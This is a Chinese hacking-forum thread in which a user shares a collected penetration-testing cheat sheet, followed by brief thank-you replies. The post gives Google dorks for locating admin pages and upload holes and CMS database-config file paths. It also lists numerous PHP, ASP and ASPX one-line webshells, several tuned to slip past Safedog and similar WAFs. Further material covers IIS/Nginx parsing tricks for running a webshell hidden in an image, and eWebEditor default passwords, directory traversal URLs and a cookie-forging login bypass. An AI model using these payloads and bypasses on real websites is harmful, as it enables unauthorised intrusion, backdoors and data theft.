设为首页收藏本站
查看: 2117|回复: 13

[分享] 最近网上收集的渗透经验,大牛可参考,菜鸟作宝典(不喜勿踩)

  [复制链接]
  • TA的每日心情
    开心
    2017-4-7 12:21
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2017-1-1 12:39:14 | 显示全部楼层 |阅读模式
    本帖最后由 九年旧巷 于 2017-1-1 12:41 编辑

    —————————————————————————————–
    最近网上收集的渗透经验,大牛可参考,菜鸟作宝典(不喜勿踩)




    asp类:

    foosun(风讯)
    kesion(科汛)newasp(新云)
    乔客CreateLive(创力)
    5uCMSKingCMS
    DvBBS(动网)
    BBSxp[博客]zblog
    [博客]pjblog

    —————————————————————————————–

    PHP类:
    DeDeCms(织梦)
    ECMS(帝国)
    PHPCMS
    PHP168
    HBcms(宏博)SupeSite
    CMSware(思维)Joomla!
    [BBS]Discuz!
    [BBS]phpWind[SNS]UCenterHome
    [SNS]ThinkSNS[商城]EcShop
    [商城]ShopEx[博客]WordPress
    [维基]HDWiki
    [微博]PHPsay[DIGG]PBdigg
    —————————————————————————————–

    php开源mysql绝对路径
    开源系统 数据库配置文件名 文件名所在的目录

    Discuz! config.inc.php ./ config.inc.php

    Phpcms config.inc.php ./include/config.inc.php

    Wodpress wp-config.php ./ wp-config.php

    Phpwind sqlconfig.php ./data/sqlconfig.php

    phpweb config.inc.php ./config.inc.php

    Php168v6 mysql_config.php ./php168/ mysql_config.php

    Shopex config.php ./config/config.php

    Ecshop config.php ./data/config.php

    Joomla configuration.php ./ configuration.php

    UCenter config.inc.php ./data/config.inc.php

    EmpireCMS config.php ./e/class/config.php

    Dedecms common.inc.php .data/common.inc.php

    Zen Cart configure.php ./includes/configure.php

    Mediawiki localsettints.php ./config/localsettints.php

    Ecshop config.php ./data/config.php

    osCommerce configure.php ./includes/configure.php

    —————————————————————————————–

    【 谷歌语法 】

    site:可以限制你搜索范围的域名.

    inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.

    intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题、URL等的文字)

    intitle: 查包含关键词的页面,一般用于社工别人的webshell密码

    filetype:搜索文件的后缀或者扩展名

    intitle:限制你搜索的网页标题.

    link: 可以得到一个所有包含了某个指定URL的页面列表.

    查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

    查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

    查找可注入点:site:域名 inurl:aspx|jsp|php|asp

    查找上传漏洞:site:域名 inurl:file|load|editor|Files

    找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

    存在的数据库:site:域名 filetype:mdb|asp|#

    查看脚本类型:site:域名 filetype:asp/aspx/php/jsp

    迂回策略**:inurl:cms/data/templates/images/index/
    网络设备关键词:intext:WEB Management Interface for H3C SecPath Series

    ==========================================================================================================================

    【 一句话木马 】

    asp一句话木马:<%eval request(“x”)%>

    php一句话木马:<?php eval($_POST[g]);?>

    aspx一句话:<%@ Page Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>

    网站配置、版权信息专用一句话:”%><%Eval Request(x)%>

    一句话再过护卫神:<%Y=request(“x”)%> <%execute(Y)%>

    过拦截一句话木马:<% eXEcGlOBaL ReQuEsT(“x”) %>

    asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%

    能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

    突破安全狗的一句话:<%Y=request(“x”)%> <%eval(Y)%>

    elong过安全狗的php一句话:<?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[cc]); ?>

    后台常用写入php一句话(密码x):

    <?

    $fp = @fopen(“c.php”, ‘a’);

    @fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”);

    @fclose($fp);

    ?>

    高强度php一句话:

    <?php substr(md5($_REQUEST[‘heroes’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?>

    新型变异PHP一句话(密码b4dboy):

    ($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

    突破安全狗的aspx一句话:

    <%@ Page Language=”C#” ValidateRequest=”false” %>

    <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

    突破护卫神,保护盾一句话:

    <?php $a = str_replace(x,””,”axsxxsxexrxxt”);

    $a($_POST[“test”]); ?>

    许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。

    改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉

    这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的。

    PHP高强度一句话:

    <?php substr(md5($_REQUEST[‘x’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?> 菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c

    <?php assert($_REQUEST[“c”]);?> 菜刀连接 躲避检测 密码:c

    ==========================================================================================================================

    【 解析漏洞总结 】

    IIS 6.0

    目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码

    IIS6.0 会将 xx.jpg 解析为 asp 文件。

    后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)

    IIS6.0 都会把此类后缀文件成功解析为 asp 文件。

    默认解析:/xx.asa /xx.cer /xx.cdx

    IIS6.0 默认的可执行文件除了 asp 还包含这三种

    此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

    IIS 7.0/ IIS 7.5/ Nginx <8.03

    在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

    常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾

    e.g.

    copy xx.jpg/b + yy.txt/a xy.jpg

    /b 即二进制[binary]模式

    /a 即ascii模式 xx.jpg正常图片文件

    yy.txt 内容 <?PHP fputs(fopen(‘shell.php’,’w’),‘<?php eval($_POST[cmd])?>’);?>

    意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件

    找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。

    .然后就在图片目录下生成一句话木马 shell.php 密码 cmd

    ==========================================================================================================================

    【 ewebeditor编辑器 】

    默认后台:ewebeditor/admin_login.asp

    帐号密码:admin admin

    样式设计:ewebeditor/admin_style.asp

    查看版本:ewebeditor/dialog/about.html

    数据库路径:db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名)

    遍历目录:ewebeditor/admin/upload.asp?id=16&amp;d_viewmode=&amp;dir =../..

    跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=.. (dir为列目录, ..为返回上层目录),形式:dir ../..

    点上传文件管理-随便选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)

    ( ewebeditor5.5版本 )

    默认后台:ewebeditor/admin/login.asp

    帐号密码:admin 198625

    数据库路径:data/%23sze7xiaohu.mdb

    遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

    调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup

    ( ewebeditor3.8 php版本 )

    默认后台:eWebEditor/admin/login.php

    首先随便输入一个帐号和密码,接着系统会提示出错,这时清空浏览器的url,然后输入以下代码后连按三次回车键:

    javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));

    接着访问文件:ewebeditor/admin/default.php 就可以直接进入后台了。

    ( ewebeditor编辑器exp手册 )

    有时候什么后缀都上传了,还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试

    一:文件上传成功了,但是访问不成功,说明该目录(比如:/UploadFile)被设置了权限,返回去换成/ 上传到根目录就行了.增加asp等不行的时候,可以利用解析asp;jpg

    二:下载数据库查看前人留下的痕迹,再访问上传页面拿shell。

    页面路径:/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在语句里访问,上传相对应的格式木马。

    ==========================================================================================================================


    由于字数限制,就不再展示了,大家仅供参考


  • TA的每日心情
    郁闷
    2017-1-1 15:35
  • 签到天数: 31 天

    [LV.5]常住居民I

    发表于 2017-1-1 15:41:05 | 显示全部楼层
    反正我是一句话都看不懂
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-4-7 12:21
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2017-1-1 17:17:12 来自手机 | 显示全部楼层
    自作聪明二代 发表于 2017-01-01 15:41:05
    反正我是一句话都看不懂

    看点教程,一看就知道了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    4 天前
  • 签到天数: 298 天

    [LV.8]以坛为家I

    发表于 2017-1-5 09:12:52 | 显示全部楼层
    这个就可以,支持分享感谢原创
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-10-5 13:06
  • 签到天数: 38 天

    [LV.5]常住居民I

    发表于 2017-1-11 18:47:26 | 显示全部楼层
    非常棒,辛苦楼主了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-4-1 14:27
  • 签到天数: 56 天

    [LV.5]常住居民I

    发表于 2017-1-11 22:45:08 | 显示全部楼层
    不错 谢谢楼主
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-1-27 19:17
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 2017-1-12 18:52:42 | 显示全部楼层
    呵呵.......
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-4-20 00:05
  • 签到天数: 19 天

    [LV.4]偶尔看看III

    发表于 2017-1-12 23:57:29 来自手机 | 显示全部楼层
    加我分享教程
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-1-13 09:29
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2017-1-13 09:48:03 | 显示全部楼层

    虽然很不想做伸手党   但奈何技术问题还是得拿   哈哈  在此感谢一下楼主
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-1-31 11:27
  • 签到天数: 22 天

    [LV.4]偶尔看看III

    发表于 2017-1-14 20:38:57 | 显示全部楼层
    感谢楼主分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-10-20 21:40
  • 签到天数: 168 天

    [LV.7]常住居民III

    发表于 2017-1-14 21:19:30 来自手机 | 显示全部楼层
    你这可以算是漏洞总结吧
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-10-29 03:41
  • 签到天数: 22 天

    [LV.4]偶尔看看III

    发表于 2017-2-16 21:12:24 | 显示全部楼层
    带走了,正好看过一点,谢谢楼主
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2017-7-19 21:54
  • 签到天数: 28 天

    [LV.4]偶尔看看III

    发表于 2017-2-17 19:39:38 | 显示全部楼层
    可以啊  谢谢啊    虽然我只用一点点
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-3-22 19:03
  • 签到天数: 29 天

    [LV.4]偶尔看看III

    发表于 2017-2-18 23:24:32 | 显示全部楼层
        我也是新手, 都知道这些是什么,  但是大部分都不知道怎么用, 看来还得多多的努力啊
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国红客联盟 

    Processed in 2.266533 second(s), 42 queries.

    站点统计| 举报| Archiver| 手机版| 小黑屋

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表